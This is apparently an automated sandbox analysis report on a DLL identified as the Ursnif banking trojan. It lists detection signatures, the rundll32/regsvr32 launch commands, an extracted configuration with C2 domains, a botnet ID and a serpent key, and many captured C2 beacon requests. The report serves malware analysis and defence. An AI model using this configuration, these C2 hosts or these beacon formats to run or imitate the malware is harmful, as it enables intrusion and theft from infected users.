Windows Analysis Report
Wartless_v8.8.9.0.dll

Overview

General Information

Sample Name: Wartless_v8.8.9.0.dll
Analysis ID: 557481
MD5: 3b4e9e88c0dd6e82ecc65e2d219544c6
SHA1: 5d4f4d60773ed452188c8a099b5972edbbb03f90
SHA256: 4d4bedbc795e2dd4fe929b6dc57bfc314165795e25c362959fbabc59c0a60d80
Tags: exegoziisfbitalypwvodafoneursnifvodafone
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Registers a DLL
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7132 cmdline: loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2276 cmdline: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 784 cmdline: regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6460 cmdline: rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6600 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6828 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4140 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6288 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6376 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6076 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6900 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6000 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6508 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5348 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3648 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5228 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6776 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4844 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6852 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 344 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4716 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6512 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6464 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 1140 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup
{"RSA Public Key": "LZsqpoecyAjADjfU7Chg08upMmPh9s52KURwMLeVbExqR0WPzjmiY0sqvuBbVd5UliPpiI1vk//fFbZdaVlJSGEUDRBnUiuB3fsNsZ3RoyiCzywMw4Zr6FxF+hc1b9zRYTQ2cNf3eyWqBzjCdRFagMiiQA+otNVjG6WfRndly80y3zvvE9kF1wgUwiJf27Urr8Ahb9uaOANUBf0VZ8YlfDKqKw0aV0vJ95MA4pfWcKcjRoAs02M+uPJPXQEHtRmRwiN5u8e5omIKfq2TZoNpq6PEAHr8gg2QcaCj9KeqSJEExzjUeb+9ROWN6YZRxQfpZog28cwcG13DaWclsLLFv5K3EZuwv3sh9x7+0P3sHaY=", "c2_domain": ["intermedia.bar", "nnnnnn.bar", "nnnnnn.casa"], "botnet": "7576", "server": "50", "serpent_key": "lMfWhcERJ9HGK8sX", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source                                                              Rule                Description           Author        Strings
00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security
00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security
00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security
00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security
00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security

            System Summary

            Source: Process started Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6304, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, ProcessId: 2276

            AV Detection

            Source: 00000006.00000002.810976367.0000000003FF0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif
            Source: Wartless_v8.8.9.0.dll Virustotal: Detection: 19%
            Source: Wartless_v8.8.9.0.dll ReversingLabs: Detection: 13%
            Source: nnnnnn.bar Virustotal: Detection: 12%
            Source: nnnnnn.casa Virustotal: Detection: 12%
            Source: www.nnnnnn.casa Virustotal: Detection: 7%
            Source: Wartless_v8.8.9.0.dll Joe Sandbox ML: detected
            Source: 1.2.loaddll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
            Source: 9.2.rundll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
            Source: 5.2.regsvr32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
            Source: 6.2.rundll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_010C4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_010C4872
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_04F94872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_04F94872
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04214872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,6_2_04214872
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_04444872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,9_2_04444872
            Source: Wartless_v8.8.9.0.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

            Networking

            Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 31.41.46.120:80
            Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 31.41.46.120:80
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.41.46.120 80
            Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: www.nnnnnn.casa
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 162.255.119.177 80
            Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: nnnnnn.casa
            Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: intermedia.bar
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 198.54.117.212 80
            Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: nnnnnn.bar
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.64.119.233 80
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 198.54.117.215 80
            Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 198.54.117.216 80
            Source: Joe Sandbox View ASN Name: ASRELINKRU ASRELINKRU
            Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox View IP Address: 198.54.117.218 198.54.117.218
            Source: Joe Sandbox View IP Address: 198.54.117.210 198.54.117.210
            Source: unknown, DNS traffic detected: queries for: intermedia.bar
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.bar
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.casaConnection: Keep-AliveCache-Control: no-cache
